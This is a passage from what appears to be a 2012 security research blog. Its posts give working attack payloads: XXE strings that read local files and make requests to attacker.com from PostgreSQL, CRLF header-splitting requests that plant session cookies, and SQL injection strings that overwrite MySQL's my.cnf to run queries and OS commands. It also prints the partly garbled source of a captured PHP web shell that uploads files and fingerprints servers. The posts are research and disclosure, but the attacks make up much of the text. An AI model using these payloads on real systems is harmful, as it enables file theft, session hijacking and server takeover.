четверг, 20 декабря 2012 г.

Advanced mobile UI redressing attacks using gyroscope/accelerometer

When you hold a mobile phone in hand and put your finger on the screen area where you want to tap, you move phone a little.

These deviations can be measured with a built-in gyroscope and accelerometer and use for UI-redressing attack.

You probably won't react timely to take off your finger while pressing the screen even if you see some other graphic object (such as window or button) on the area where you are going to press.

Funny video:

четверг, 4 октября 2012 г.

Error-based XXE exploitation trick

Exploiting of XXE vulnerabilities are difficult when you cannot view results XML document.

Recent vulnerability in Postgres XXE are good example of this: entities resolved but not added to XML output. This is common case in the wild.

Bring to your attention easy trick which provide reading first and last lines of ASCII files (which cannot be read by classic XXE attack vector, such as error-based case):

   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
<!-- read first line of file using error-based XXE -->
&malformed; &wanttoread;

   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
<!-- read last line of file using error-based XXE -->
 &wanttoread; &malformed;

In error message you will look at smth like this:
ERROR: hostnamestr
didn't parse (line: 1 pos: 13)

четверг, 23 августа 2012 г.

PHP multiple headers bypass available again

Recenlty we wrote about universal PHP bypass for header() function.
That trick is based on %0d byte instead of %0d%0a to split HTTP response.
Bug was fixed as you can see at changelog:
Version 5.3.11  
Fixed bug #60227 (header() cannot detect the multi-line header with CR). 
 https://bugs.php.net/bug.php?id=60227 is original bug
And what about fix?

                for (i = 0; i < header_line_len; i++) {
                        /* RFC 2616 allows new lines if followed by SP or HT */
                        int illegal_break =
                                        (header_line[i+1] != ' ' && header_line[i+1] != '\t')                                        && (
                                                header_line[i] == '\n'
                                                || (header_line[i] == '\r' && header_line[i+1] != '\n'));
Pay your attention to red line.

And as we wrote before, bug still available for Internet Explorer.

Source code:
header("Location: /?asd".$_GET['r']);
Attack vectors:
GET /?r=split%0d+Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%20Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%09Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a+Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a%20Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a%09Set-cookie:PHPSESSID=predicated HTTP/1.1

пятница, 1 июня 2012 г.

PostgreSQL (all) error-based XXE 0day

Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
Classical XXE from XSLT transformation found.
Reading any data are possible also:

SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
 <?xml version="1.0"?>
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

(1 row)

суббота, 26 мая 2012 г.

PHP all getimage() bypass

Many PHP projects have image validation, based on getimagesize() function:

That function has an error, provides attacker to read Berkley DB format and another files, started at 0x00 (null-byte).

   echo "OK";
#php -f gis-test.php

In *BSD systems and MacOS Berkley DB files used as configs.
It may be used by attacker to bypass image reading functions based on getimagesize().

We used that trick on PHD pre-hackquest's (Blow Up the Town) task called Tretyakovskaya.
It was sucessfull find by participants listed below:
Greetz, guys!

вторник, 17 апреля 2012 г.

Find new web bot [Jembot]

We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:

echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
if ($_FILES["file"]["error"] > 0)
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
if (file_exists("" . $_FILES["file"]["name"]))
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
elseif ($_GET["empix"]){
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell

Attacks coming from IP Brasil

inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022 
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106 
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830 
We strongly recommend to block this ip address and run the following command to detect attacks:
#egrep -n --color "hell.php" *.log

воскресенье, 4 марта 2012 г.

Advanced SQLi exploitation with FILE_PRIV

We would like to open our blog notes on the practical implementation of the SQL-injections. 
And also we try to focus more attention on the practical aspects of web application security in the future.

SQL injections are the most common server-side Web application vulnerabilities and meet almost every audit in our practice.
Very often it happens that through these vulnerabilities we can write files (granted FILE_PRIV).
The simplest way of the exploitation in this case - write executable script (i.e. shell.php) in www-root (i.e. /var/www/).
But sometimes there is no filesystem rights to write in /var/www.

We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!

The idea is very simple and is to replace the file my.cnf. This configuration file is write-protected directory:
-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf
#debian lenny
However, if you write my.cnf in DATADIR it will work! And DATADIR is writable always:
drwx------  4 mysql   mysql   4096 /var/lib/mysql
#debian lenny

Then look at documentation:

Finally, attack vector will be like that:
'AND 1=2 UNION SELECT '[mysqld]\ninit-connect="update users set passwd=123 where id=0"\n#
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -

Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.
Query in init-connect will be executed after the non-SUPER user logs in. 
And there is another problem - you must somehow restart MySQL daemon.
The easiest way to wait until it happens naturally.
But you can always send a hard query to exceed a memory limit. 
Then OOM Killer make your job ;)

On MySQL 5.1.2+ (required by http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir) you can also execute OS commands by my.cnf like that:
plugin_dir = /var/tmp/aaa # 5.1.2+ only
init-connect = "CREATE FUNCTION do_system RETURNS INTEGER SONAME 'so_system.so.0.0';"
# 2 3 4 5 6 7 8 9 10 11
Where /var/tmp/aaa is any writable directory, so_system.so.0.0 is your binary library.

UPDATE: see also genius work from: http://www.wisec.it/sectou.php?p=1
AND 1=0 union select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATEDEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 whereisadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

Thank you for your attention.
//Alexander Golovko, Vladimir d0znpp Vorontsov